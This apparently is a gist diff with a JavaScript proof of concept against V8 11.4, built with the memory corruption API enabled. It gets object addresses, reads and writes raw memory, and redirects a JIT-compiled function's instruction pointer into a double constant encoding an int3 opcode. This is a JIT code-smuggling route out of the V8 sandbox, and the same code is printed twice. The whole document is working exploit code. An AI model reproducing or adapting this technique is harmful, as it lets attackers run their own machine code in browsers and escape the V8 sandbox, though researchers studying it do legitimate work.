mistymntncop · November 25, 2023 10:37
diff --git a/v8sbx.js b/v8sbx.js
 //v8 version 11.4.183.19
 //git checkout 56e5481171da3eacd3cb83db2be3b2d2b96b4abb 
 //MODIFY BUILD.gn in the root v8 folder to enable the memory corruption api
 //v8_expose_memory_corruption_api = true
 //ninja -C ./out/x64.debug d8   
 //ninja -C ./out/x64.release d8


 const addr_of = (o) => {
    return Sandbox.getAddressOf(o);
 };

 const weak_read32 = (p) => {
    let reader = new Sandbox.MemoryView(p, 32);
    let view = new DataView(reader);
    return view.getUint32(0, true); 
 };

 const weak_read64 = (p) => {
    let reader = new Sandbox.MemoryView(p, 64);
    let view = new DataView(reader);
    return view.getBigUint64(0, true); 
 };

 const weak_write32 = (p, x) => {
    let writer = new Sandbox.MemoryView(p, 32);
    let view = new DataView(writer);
    view.setUint32(0, x, true);
 };

 const weak_write64 = (p, x) => {
    let writer = new Sandbox.MemoryView(p, 64);
    let view = new DataView(writer);
    view.setBigUint64(0, x, true);
 };

 //1.01e-321 = 0x00000000000000CC (int3)
 function jit_me() {
    return [1.01e-321, 2.2, 3.3, 4.4];
 }
 
 for (let i = 0; i < 0x3000; i++) {
    jit_me();
    jit_me();
 }
 %DebugPrint(jit_me);

 let jim_me_addr = addr_of(jit_me);
 let code_struct_addr = weak_read32(jim_me_addr + 0x18);
 let instruction_start_addr = code_struct_addr-1 + 0x10;
 let instruction_start = weak_read64(instruction_start_addr);
 //const offset_to_constant = 0x6Dn + 2n; //debug
 const offset_to_constant = 0x54n + 2n; //release
 let new_instruction_start = instruction_start + offset_to_constant;

 %GlobalPrint("jim_me_addr = " + jim_me_addr.toString(16) + "\n");
 %GlobalPrint("code_struct_addr = " + code_struct_addr.toString(16) + "\n");
 %GlobalPrint("instruction_start_addr = " + instruction_start_addr.toString(16) + "\n");
 %GlobalPrint("instruction_start = " + instruction_start.toString(16) + "\n");
 %GlobalPrint("new_instruction_start = " + new_instruction_start.toString(16) + "\n");

 weak_write64(instruction_start_addr, new_instruction_start);
 jit_me();
	//v8 version 11.4.183.19
	//git checkout 56e5481171da3eacd3cb83db2be3b2d2b96b4abb
	//MODIFY BUILD.gn in the root v8 folder to enable the memory corruption api
	//v8_expose_memory_corruption_api = true
	//ninja -C ./out/x64.debug d8
	//ninja -C ./out/x64.release d8


	const addr_of = (o) => {
	return Sandbox.getAddressOf(o);
	};

	const weak_read32 = (p) => {
	let reader = new Sandbox.MemoryView(p, 32);
	let view = new DataView(reader);
	return view.getUint32(0, true);
	};

	const weak_read64 = (p) => {
	let reader = new Sandbox.MemoryView(p, 64);
	let view = new DataView(reader);
	return view.getBigUint64(0, true);
	};

	const weak_write32 = (p, x) => {
	let writer = new Sandbox.MemoryView(p, 32);
	let view = new DataView(writer);
	view.setUint32(0, x, true);
	};

	const weak_write64 = (p, x) => {
	let writer = new Sandbox.MemoryView(p, 64);
	let view = new DataView(writer);
	view.setBigUint64(0, x, true);
	};

	//1.01e-321 = 0x00000000000000CC (int3)
	function jit_me() {
	return [1.01e-321, 2.2, 3.3, 4.4];
	}

	for (let i = 0; i < 0x3000; i++) {
	jit_me();
	jit_me();
	}
	%DebugPrint(jit_me);

	let jim_me_addr = addr_of(jit_me);
	let code_struct_addr = weak_read32(jim_me_addr + 0x18);
	let instruction_start_addr = code_struct_addr-1 + 0x10;
	let instruction_start = weak_read64(instruction_start_addr);
	//const offset_to_constant = 0x6Dn + 2n; //debug
	const offset_to_constant = 0x54n + 2n; //release
	let new_instruction_start = instruction_start + offset_to_constant;

	%GlobalPrint("jim_me_addr = " + jim_me_addr.toString(16) + "\n");
	%GlobalPrint("code_struct_addr = " + code_struct_addr.toString(16) + "\n");
	%GlobalPrint("instruction_start_addr = " + instruction_start_addr.toString(16) + "\n");
	%GlobalPrint("instruction_start = " + instruction_start.toString(16) + "\n");
	%GlobalPrint("new_instruction_start = " + new_instruction_start.toString(16) + "\n");

	weak_write64(instruction_start_addr, new_instruction_start);
	jit_me();